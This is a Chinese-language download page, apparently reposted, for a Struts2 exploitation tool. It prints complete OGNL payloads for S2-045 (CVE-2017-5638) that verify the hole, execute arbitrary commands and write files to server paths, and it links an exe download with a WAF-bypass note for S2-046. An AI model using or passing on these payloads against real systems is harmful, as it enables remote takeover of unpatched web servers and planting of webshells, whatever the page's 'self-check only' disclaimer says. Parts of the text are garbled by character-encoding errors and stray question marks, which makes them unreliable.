s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)
Struts2漏洞利用工具下載(已更新V1.8版)
2017-03-21:
增加S2-046,官方發(fā)布S2-046和S2-045漏洞引發(fā)原因一樣,只是利用漏洞的位置發(fā)生了變化,S2-046方式可能繞過(guò)部分WAF防護(hù),存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html、
2017-03-07:
增加安恒信息研究員nike.zheng發(fā)現(xiàn)的S2-045,jakatar處理復(fù)雜數(shù)據(jù)類型時(shí),異常處理不當(dāng),導(dǎo)致OGNL代碼執(zhí)行,通過(guò)在請(qǐng)求的Content-Type頭中構(gòu)造OGNL表達(dá)式來(lái)執(zhí)行Java代碼。http://struts.apache.org/docs/s2-045.html
相關(guān)exp:
S2-045:
1.驗(yàn)證漏洞,修改Content-Type,返回內(nèi)容為“webpath”代表存在漏洞。
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}
2.執(zhí)行命令
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}
3.上傳文件:
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).(#res.getWriter().close())}
S2-032 20160426??漏洞參考 http://seclab.dbappsecurity.com.cn/?p=924
更新日志:
2017-03-21:
增加S2-046,官方發(fā)布S2-046和S2-045漏洞引發(fā)原因一樣,只是利用漏洞的位置發(fā)生了變化,S2-046方式可能繞過(guò)部分WAF防護(hù),存在S2-045就存在S2-046。http://struts.apache.org/docs/s2-046.html
2017-03-07:
增加安恒信息研究員nike.zheng發(fā)現(xiàn)的S2-045,jakatar處理復(fù)雜數(shù)據(jù)類型時(shí),異常處理不當(dāng),導(dǎo)致OGNL代碼執(zhí)行,通過(guò)在請(qǐng)求的Content-Type頭中構(gòu)造OGNL表達(dá)式來(lái)執(zhí)行Java代碼。http://struts.apache.org/docs/s2-045.html
2016-04-26:
增加最新的S2-032遠(yuǎn)程代碼執(zhí)行漏洞,和S2-019很相似。
參考:http://seclab.dbappsecurity.com.cn/?p=924
2015-12-01:
采用scanner讀數(shù)據(jù)流,再也不用擔(dān)心s16不能執(zhí)行net?user/ipconfig/netstat?-an等命令了。
增加復(fù)雜數(shù)據(jù)包(multipart/form-data)提交方式進(jìn)行漏洞利用,可繞過(guò)部分防護(hù)。可執(zhí)行命令,暫時(shí)無(wú)法上傳文件。
2014-11-12:
最近遇到s19這個(gè)debug模式開(kāi)啟導(dǎo)致代碼執(zhí)行,這個(gè)有點(diǎn)少,但還是有一些,為了方便大家把13版本修改了一下。可以利用這個(gè)漏洞執(zhí)行命令、上傳shell。
警告:
本工具為漏洞自查工具,請(qǐng)勿非法攻擊他人網(wǎng)站!
==漏洞編號(hào)==============影響版本=========================官方公告==========================================影響范圍=====
S2-045?CVE-2017-5638?Struts?2.3.5-2.3.31,?Struts?2.5-2.5.10?http://struts.apache.org/docs/s2-045.html?影響范圍較大
S2-037?CVE-2016-4438?Struts?2.3.20-2.3.28.1?http://struts.apache.org/docs/s2-037.html?影響范圍小
S2-032?CVE-2016-3081?Struts?2.3.18-2.3.28?http://struts.apache.org/release/2.3.x/docs/s2-032.html?影響范圍小
S2-020?CVE-2014-0094?Struts?2.0.0-2.3.16?http://struts.apache.org/release/2.3.x/docs/s2-020.html?影響范圍小
S2-019?CVE-2013-4316?Struts?2.0.0-2.3.15.1?http://struts.apache.org/release/2.3.x/docs/s2-019.html?影響范圍一般
S2-016?CVE-2013-2251?Struts?2.0.0-2.3.15?http://struts.apache.org/release/2.3.x/docs/s2-016.html?影響范圍非常大
S2-013?CVE-2013-1966?Struts?2.0.0-2.3.14?http://struts.apache.org/release/2.3.x/docs/s2-013.html?未添加,S2-016范圍內(nèi)
S2-009?CVE-2011-3923?Struts?2.0.0-2.3.1.1?http://struts.apache.org/release/2.3.x/docs/s2-009.html?未添加,S2-016范圍內(nèi)
S2-005?CVE-2010-1870?Struts?2.0.0-2.1.8.1?http://struts.apache.org/release/2.2.x/docs/s2-005.html?未添加,S2-016范圍內(nèi)
僅提供驗(yàn)證漏洞使用,請(qǐng)勿非法使用,產(chǎn)生的任何法律問(wèn)題,一概與本人無(wú)關(guān)。
下載地址:
文件名稱: Struts2漏洞利用工具2017版.exe
文件大小: 104 KB (107008 字節(jié))
文件版本: 1.8.0.0
修改時(shí)間: 2017年03月22日,17:39:29
MD5: 3B405C30A7028E05742D0FBF0961E6B2
SHA1: 1D69338543544B31444D0173C08E706D57F148CB
CRC32: 97AC167B
計(jì)算時(shí)間: 0.00s
總結(jié)
以上是生活随笔為你收集整理的s2 安恒 漏洞验证工具_Struts2漏洞利用工具下载(更新2017-V1.8版增加S2-045/S2-046)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 特斯拉与瑞典工会冲突升温,专用零部件供应
- 下一篇: “黑色星期五”期间亚马逊在欧洲多地遭遇罢